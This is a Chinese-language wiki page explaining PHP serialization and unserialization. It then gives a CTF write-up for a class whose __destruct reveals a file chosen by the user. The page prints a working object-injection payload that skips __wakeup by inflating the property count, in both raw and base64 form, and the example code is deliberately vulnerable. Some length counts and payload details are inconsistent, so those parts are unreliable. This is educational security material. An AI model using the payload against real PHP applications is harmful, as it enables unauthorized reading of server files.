Skip to content

PHP序列化与反序列化

Jump to bottom
Stack_sqx edited this page Feb 13, 2020 · 3 revisions

序列化 serialization

serialize() ---> 函数用于序列化对象或数组,并返回一个字符串。

<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
echo  $serialized_data;
?>

output

a:3:{i:0;s:2:"t1";i:1;s:3:"tt2";i:2;s:4:"ttt3";}

  • a:表示整体的数据类型,这里是array;

  • a:4中的4:表示数组元素的个数;

  • i:表示int,整型;

  • 0:表示数组元素的下标;

  • s:表示string,即数组值的类型;

  • s:3中3:表示数组值的长度。

serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方

反序列化

<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
#echo  $serialized_data;
$unserialized_data = unserialize($serialized_data);
print_r($unserialized_data);
?>

output should be like this

Array
(
    [0] =>  t1
    [1] =>  tt2
    [2] =>  ttt3
)

put into practice

利用 php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。

一句话解释,用膜法打败膜法

引入例题

<?php
  class SoFun{ 
    protected $file='index.php';
    function __destruct(){
        if(!empty($this->file)) 
        {
            //查找file文件中的字符串,如果有'\\'和'/'在字符串中,就显示错误
            if(strchr($this->file,"\\")===false &&  strchr($this->file, '/')===false)
            {
                show_source(dirname (__FILE__).'/'.$this ->file);
            }
            else{
                    die('Wrong filename.');
                }
        }
    }
    function __wakeup()
    { 
        $this-> file='index.php';
    } 
    public function __toString()
    {
        return '';
    }
    }     
    if (!isset($_GET['file']))
    { 
        show_source('index.php'); 
    } 
    else{ 
       $file=base64_decode( $_GET['file']); 
       echo unserialize($file ); 
    } 
?>  #<!--flag in flag.php-->

审计代码,可以发现要得到flag ,思路如下:

  • 源码最后提示,flag 在flag.php里面;
  • 注意到__destruct中,有这么一段代码,将file文件内容显示出来
show_source(dirname(FILE).’/‘.$this->file)

作用就是将file文件内容显示出来

  • 若POST“file”参数为序列化对象,且将file设为flag.php;那么可以通过unserialize反序列化,进而调用__destruct魔术方法来显示flag.php源码(要注意的是file参数内容需要经过base64编码);
  • 上面的分析是多么美好,但从代码分析可以知道,还有__wakeup这个拦路虎,通过unserialize反序列化之后,也会调用__wakeup方法,它会把file设为index.php;
  • 总结下来就是,想办法把file设为flag.php,调用__destruct方法,且绕过__wakeup。

PHP反序列化对象注入漏洞

上网查资料,发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。

简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。举个栗子,比如有个Student类,里面有个参数为name。 实际情况:O:7:”Student”:1:{S:4:”name”;s:8:”sqx”;} Payload:O:7:”Student”:2:{S:4:”name”;s:8:”sqx”;} Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。

简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。

payload = ?file=O:5:"SoFun":2:{s:11:"\00*\00file";s:8:"flag.php";} 或者 payload = _?file=O:5:"SoFun":2:{S:7:"\00*\00file";s:8:"flag.php";}_

经过base64加密后 payload = ?file=Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ== 得到flag

Welcome to the web playground

Inspired by @LFYSec

Clone this wiki locally